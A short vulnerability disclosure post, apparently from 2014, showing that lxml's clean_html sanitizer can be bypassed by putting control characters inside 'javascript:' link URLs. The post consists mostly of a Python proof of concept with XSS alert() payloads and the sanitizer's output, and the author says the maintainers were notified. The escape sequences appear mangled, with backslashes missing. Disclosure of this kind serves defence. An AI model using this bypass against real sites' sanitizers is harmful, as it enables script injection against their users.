Home / os / blackberry

lxml Filter Bypass

Posted on 16 April 2014

Hi, all I've accidentally found vulnerability in clean_html function of lxml python library. User can break schema of url with nonprinted chars (x01-x08). Seems like all versions including the latest 3.3.4 are vulnerable. Here is PoC. from lxml.html.clean import clean_html html = ''' <html> <body> <a href="javascript:alert(0)"> aaa</a> <a href="javasx01cript:alert(1)">bbb</a> <a href="javasx02cript:alert(1)">bbb</a> <a href="javasx03cript:alert(1)">bbb</a> <a href="javasx04cript:alert(1)">bbb</a> <a href="javasx05cript:alert(1)">bbb</a> <a href="javasx06cript:alert(1)">bbb</a> <a href="javasx07cript:alert(1)">bbb</a> <a href="javasx08cript:alert(1)">bbb</a> <a href="javasx09cript:alert(1)">bbb</a> </body> </html>''' print clean_html(html) Output: <div> <body> <a href="">aaa</a> <a href="javascript:alert(1)"> bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="">bbb</a> </body> </div> I've emailed lxml-guys. Hope they'll fix it soon. ---- ksimka (@m_ksimka)

 

TOP